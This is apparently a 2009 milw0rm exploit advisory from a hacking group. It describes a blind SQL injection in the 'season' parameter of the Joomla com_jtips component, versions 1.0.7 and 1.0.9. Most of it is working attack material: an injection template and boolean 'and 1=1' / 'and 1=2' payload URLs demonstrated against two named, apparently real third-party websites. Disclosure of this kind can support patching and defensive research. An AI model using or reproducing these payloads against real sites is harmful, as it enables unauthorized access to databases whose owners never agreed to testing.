42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
Joomla Component com_jtips (season) Blind SQL-injection Vulnerability
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
###################################################
|
|
[+] Author : Chip D3 Bi0s
|
|
[+] Group : LatinHackteam
|
|
--------------------------------------------------
|
|
author : Russell...
|
|
author Email : chipdebios[alt+64]gmail.com
|
|
|
|
###################################################
|
|
|
|
Example:
|
|
http://localhost/path/index.php?option=com_jtips&Itemid=1&task=ladder&season=2[SQL code]
|
|
|
|
|
|
DEMO (1):
|
|
http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=1
|
|
True !!!!
|
|
|
|
http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=2
|
|
False !!!
|
|
|
|
|
|
DEMO (2):
|
|
http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=1
|
|
True !!!
|
|
|
|
http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=!
|
|
False !!!
|
|
|
|
|
|
etc, etc....
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
#[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
|
|
tested: 1.0.7 / 1.0.9
|
|
|
|
# milw0rm.com [2009-08-24] |